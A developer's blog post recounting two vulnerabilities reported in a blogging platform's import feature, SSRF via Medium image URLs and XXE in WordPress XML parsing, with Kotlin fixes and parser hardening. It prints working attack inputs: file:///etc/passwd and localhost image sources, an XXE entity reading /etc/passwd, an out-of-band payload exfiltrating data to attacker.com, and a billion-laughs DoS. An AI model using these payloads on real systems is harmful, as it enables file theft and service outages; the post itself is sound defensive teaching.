Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications?

Hackers.

Every new feature is another opportunity for them: a potential new vulnerability.

Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive).

And on Monday I received this message:

Huge vuln on writizzy
Hello, you have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
Your /etc/passwd as proof:
Micka

Since your own applications may well have the same kind of vulnerability, let me show you how SSRF and XXE attacks work, and how I fixed them.

The SSRF Vulnerability

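SSRF stands for "Server-Side Request Forgery": an attack that tricks a server into making requests on the attacker's behalf, reaching resources that only the server can access, such as local files or internal services.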

But how do you access these resources by triggering a data import with a ZIP archive?

The import feature relies on one key principle: I download the images referenced in each migrated article and re-upload them to my own storage (Bunny in my case).

For example, imagine I have this in a Medium page:

<img src="https://cdn-images-1.medium.com/max/800/image.jpg"/>

I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this:

![](https://cdn.bunny.net/blog/12132132/image.jpg)

So to do this, at some point I open a URL to the image:

import java.net.URL

// Inside the image import function: on any failure, keep the original URL
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}

Then I upload the byte array to Bunny.

Okay. But what happens if the user writes this:

<img src="file:///etc/passwd">

The previous code opens the URL with whatever protocol it specifies, here file. Java's URLConnection happily reads local files, so the code reads /etc/passwd and uploads its content to the CDN, where it is now publicly accessible.
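To see this for yourself without touching the real /etc/passwd, here is a small sketch (readViaUrl and leakDemo are names I made up) that runs the same kind of openConnection() call against a file: URL pointing to a temporary file. No HTTP is involved: the JDK's built-in file handler simply returns the file's bytes.

```kotlin
import java.io.File
import java.net.URL

// Hypothetical helper mirroring the image download code: it opens whatever
// URL it is given, with no protocol check. Demonstration only.
fun readViaUrl(rawUrl: String): ByteArray =
    URL(rawUrl).openConnection().getInputStream().use { it.readBytes() }

// Writes a fake password file to a temporary location, then reads it back
// through a file: URL, the way the unpatched importer would.
fun leakDemo(): String {
    val fake = File.createTempFile("fake-passwd", ".txt")
    try {
        fake.writeText("root:x:0:0:root:/root:/bin/bash\n")
        return readViaUrl(fake.toURI().toString()).toString(Charsets.UTF_8)
    } finally {
        fake.delete()
    }
}
```

leakDemo() returns the fake file's content verbatim; point readViaUrl at file:///etc/passwd on a Linux machine and you get the real thing.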

You can also reach internal services this way, to scan ports or extract sensitive information (6379 is Redis's default port):

<img src="http://localhost:6379/">

The vulnerability is quite serious.

To fix it, there are several things to do. First, verify the protocol used:

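val url = java.net.URL(imageUrl)

// Only plain web protocols: file:, ftp:, jar: and the rest are refused
if (url.protocol !in listOf("http", "https")) {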
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
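The check above works on an already-built URL object. A slightly stricter variant, sketched here with a hypothetical parseHttpUrl helper, parses the raw src attribute with java.net.URI first, so anything that isn't an absolute http or https URL with a host is rejected before a URL object even exists:

```kotlin
import java.net.URI
import java.net.URISyntaxException
import java.net.URL

// Hypothetical helper: turns the raw src attribute into a URL only if it is an
// absolute http(s) URL with a host. Returns null otherwise (file:, jar:,
// ftp:, relative paths, "https:///etc/passwd", malformed input...).
fun parseHttpUrl(raw: String): URL? {
    val uri = try {
        URI(raw.trim())
    } catch (e: URISyntaxException) {
        return null
    }
    val scheme = uri.scheme?.lowercase() ?: return null // relative URL: no scheme
    if (scheme != "http" && scheme != "https") return null
    if (uri.host.isNullOrEmpty()) return null
    return try {
        uri.toURL()
    } catch (e: Exception) {
        null
    }
}
```

URI is stricter than URL, so a src with unencoded spaces is refused too. In this importer, that just means the original URL is kept, like any other refused image.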

Then, check that the URL doesn't point to a private or local address:

val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

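private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true

    // A host name can resolve to several addresses: check all of them
    val addresses = try {
        java.net.InetAddress.getAllByName(host)
    } catch (e: Exception) {
        return true // When in doubt, block it
    }

    return addresses.any { address ->
        address.isAnyLocalAddress ||      // 0.0.0.0 and ::
            address.isLoopbackAddress ||  // 127.0.0.0/8 and ::1
            address.isLinkLocalAddress || // 169.254.0.0/16 and fe80::/10
            address.isSiteLocalAddress    // 10/8, 172.16/12, 192.168/16
    }
}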
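Two details of Java's InetAddress helpers are worth knowing here: isSiteLocalAddress only recognizes the deprecated fec0::/10 IPv6 range, not the fc00::/7 unique local addresses in use today, and 0.0.0.0 (which typically reaches the local machine on Linux) is flagged by isAnyLocalAddress, not isLoopbackAddress. Here is a sketch that covers both and checks every address a name resolves to; isBlockedAddress and isBlockedHost are hypothetical names:

```kotlin
import java.net.Inet6Address
import java.net.InetAddress

// Hypothetical helper: true for addresses an image fetcher should never contact.
fun isBlockedAddress(address: InetAddress): Boolean {
    // fc00::/7 (IPv6 unique local) is not covered by isSiteLocalAddress,
    // which only recognizes the deprecated fec0::/10 range.
    val isUniqueLocalV6 = address is Inet6Address &&
        (address.address[0].toInt() and 0xFE) == 0xFC
    return address.isAnyLocalAddress || // 0.0.0.0 and ::
        address.isLoopbackAddress ||    // 127.0.0.0/8 and ::1
        address.isLinkLocalAddress ||   // 169.254.0.0/16 (cloud metadata) and fe80::/10
        address.isSiteLocalAddress ||   // 10/8, 172.16/12, 192.168/16
        isUniqueLocalV6
}

// Hypothetical helper: resolves every address of the host, since one name can
// map to several IPs and a single private one is enough to refuse it.
fun isBlockedHost(host: String): Boolean {
    val addresses = try {
        InetAddress.getAllByName(host)
    } catch (e: Exception) {
        return true // unresolvable: block it
    }
    return addresses.any { isBlockedAddress(it) }
}
```

One gap remains: the connection resolves the host name again when it opens, so a DNS server answering with a public address for the check and a private one for the request (DNS rebinding) could still slip through. Closing it completely means connecting to the exact address that was checked.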

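But there's still a risk. The user can write:

<img src="https://hacker-domain.com/image.jpg">

This URL passes both checks, but the attacker's server can answer with a redirect to an internal address. HttpURLConnection follows redirects by default (as long as the protocol stays the same), so the request ends up on a host the private-address check never saw.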

So we also need to refuse redirects:

val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000
val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode

if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
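Refusing every redirect is the simplest option, but some image hosts do redirect legitimately. If that becomes a problem, one alternative is to follow redirects by hand and re-run the checks on every hop. Here is a sketch with hypothetical names (Hop, resolveRedirects); fetchOnce stands for a single request made with instanceFollowRedirects = false, and isAllowed for the protocol and private-address checks above:

```kotlin
import java.net.URL

// Hypothetical result of one HTTP request made WITHOUT following redirects.
data class Hop(val status: Int, val location: String?)

// Follows up to maxHops redirects by hand, running isAllowed on every URL
// before requesting it. Returns the first URL that answers without a
// redirect, or null if a hop is refused, has no Location, or there are
// too many redirects.
fun resolveRedirects(
    start: URL,
    isAllowed: (URL) -> Boolean,
    fetchOnce: (URL) -> Hop,
    maxHops: Int = 3,
): URL? {
    var current = start
    repeat(maxHops + 1) {
        if (!isAllowed(current)) return null
        val hop = fetchOnce(current)
        if (hop.status !in 300..399) return current
        val location = hop.location ?: return null
        // Location may be relative, so resolve it against the current URL.
        // A malformed value throws MalformedURLException.
        current = URL(current, location)
    }
    return null
}
```

Passing the two functions in keeps the sketch testable without a network. In the importer, you would rather keep the last connection open and read the image from it than request the final URL a second time; the sketch returns a URL only to stay short.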

Be very careful whenever your server opens a connection to a URL the user controls.
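Micka's first message also said to validate the images themselves. The checks above control where the server connects; they don't guarantee that what comes back is an image. A possible extra layer, sketched under my own assumptions (a hypothetical 10 MB cap and a hand-picked list of formats), is to cap the download size and check the file's leading magic bytes before uploading anything to Bunny:

```kotlin
import java.io.ByteArrayOutputStream
import java.io.IOException
import java.io.InputStream

// Hypothetical cap: anything bigger is refused.
const val MAX_IMAGE_BYTES = 10 * 1024 * 1024

// Reads at most `limit` bytes and throws if the stream is longer, so a huge
// or endless response cannot exhaust memory.
fun readAtMost(input: InputStream, limit: Int = MAX_IMAGE_BYTES): ByteArray {
    val out = ByteArrayOutputStream()
    val buffer = ByteArray(8192)
    var total = 0
    while (true) {
        val n = input.read(buffer)
        if (n == -1) break
        total += n
        if (total > limit) throw IOException("Image larger than $limit bytes")
        out.write(buffer, 0, n)
    }
    return out.toByteArray()
}

// Checks the leading "magic bytes" of a few common web image formats.
// A text file such as /etc/passwd fails this check. Other formats (AVIF...)
// would need their own signatures.
fun looksLikeImage(bytes: ByteArray): Boolean {
    fun hasPrefix(vararg sig: Int) =
        bytes.size >= sig.size && sig.indices.all { (bytes[it].toInt() and 0xFF) == sig[it] }
    val isJpeg = hasPrefix(0xFF, 0xD8, 0xFF)
    val isPng = hasPrefix(0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A)
    val isGif = hasPrefix(0x47, 0x49, 0x46, 0x38) // "GIF8"
    val isWebp = hasPrefix(0x52, 0x49, 0x46, 0x46) && bytes.size >= 12 && // "RIFF"
        bytes.copyOfRange(8, 12).toString(Charsets.US_ASCII) == "WEBP"
    return isJpeg || isPng || isGif || isWebp
}
```

With this in place, even if a bad URL slipped through the earlier checks, a text file like /etc/passwd would be rejected before reaching the CDN.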

Except it wasn't over.

Second message from Micka:

You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test it in time to report both vulns at once. You need to fix this asap too :)

The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

Read local files (/etc/passwd, config files, SSH keys...)
Perform SSRF (requests to internal services)
Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
...
<content:encoded>&xxe;</content:encoded>

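This declaration tells the XML parser to read a local file and substitute its content wherever &xxe; appears. Here, that's the post body, which then gets imported and published with the password file inside.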

It would also have been possible to exfiltrate the file directly to an attacker-controlled server:

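<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
...
<content:encoded>&send;</content:encoded>

And on http://attacker.com/evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

The external DTD defines a send entity whose URL embeds the file's content. When the parser expands &send; in the document, it requests that URL and hands the file to the attacker.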

Finally, to crash a server, the attacker could also have done this:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<rss>
  <channel>
    <item>
      <title>&lol9;</title>
      <wp:post_id>1</wp:post_id>
      <wp:status>publish</wp:status>
      <wp:post_type>post</wp:post_type>
    </item>
  </channel>
</rss>

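Each entity repeats the previous one ten times, so expanding &lol9; produces 10^9 copies of "lol": 3 billion characters the parser has to build in memory, enough to bring the server down. (The JDK's built-in parser caps entity expansion by default through the jdk.xml.entityExpansionLimit property, but a default limit is not something to rely on.) There are variants, but you get the idea.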

We definitely don't want any of this.

This time, we need to harden the XML parser: refuse DOCTYPE declarations entirely, and never resolve external entities or DTDs:

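import javax.xml.parsers.DocumentBuilderFactory

val factory = DocumentBuilderFactory.newInstance()

// Refuse any DOCTYPE declaration: this alone blocks XXE and the billion laughs
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
// Defense in depth, in case DOCTYPEs ever have to be allowed again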
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
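To check that the hardening actually works, here is a sketch of a parser setup built from the same settings, plus FEATURE_SECURE_PROCESSING, with a hypothetical parseWordPressExport entry point that treats a rejected file as a failed import. Since disallow-doctype-decl refuses every DOCTYPE, all three payloads above are rejected, the billion laughs included; the other settings only matter if DOCTYPEs ever have to be allowed again. This assumes, as far as I know, that regular WordPress exports don't contain a DOCTYPE.

```kotlin
import java.io.ByteArrayInputStream
import javax.xml.XMLConstants
import javax.xml.parsers.DocumentBuilderFactory
import org.w3c.dom.Document
import org.xml.sax.SAXException

// Same hardening as above, plus FEATURE_SECURE_PROCESSING (JAXP processing limits).
fun secureDocumentBuilderFactory(): DocumentBuilderFactory {
    val factory = DocumentBuilderFactory.newInstance()
    factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
    factory.isXIncludeAware = false
    factory.isExpandEntityReferences = false
    return factory
}

// Hypothetical import entry point: returns null when the file is rejected,
// either because it is malformed or because it contains a DOCTYPE.
fun parseWordPressExport(xml: String): Document? = try {
    secureDocumentBuilderFactory()
        .newDocumentBuilder()
        .parse(ByteArrayInputStream(xml.toByteArray(Charsets.UTF_8)))
} catch (e: SAXException) {
    null
}
```

The default error handler also prints a "[Fatal Error]" line to stderr when a DOCTYPE is refused, which doubles as a cheap trace of attempted attacks.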

I hope you learned something. I certainly did: I should have caught the SSRF vulnerability myself, but honestly, I would never have spotted the one in the XML parser. It's thanks to Micka that I discovered this type of attack.

FYI, Micka is a wonderful person I worked with at Malt, and he works in security. You may have run into him at the capture the flag events at Mixit. And he loves hunting for this kind of vulnerability.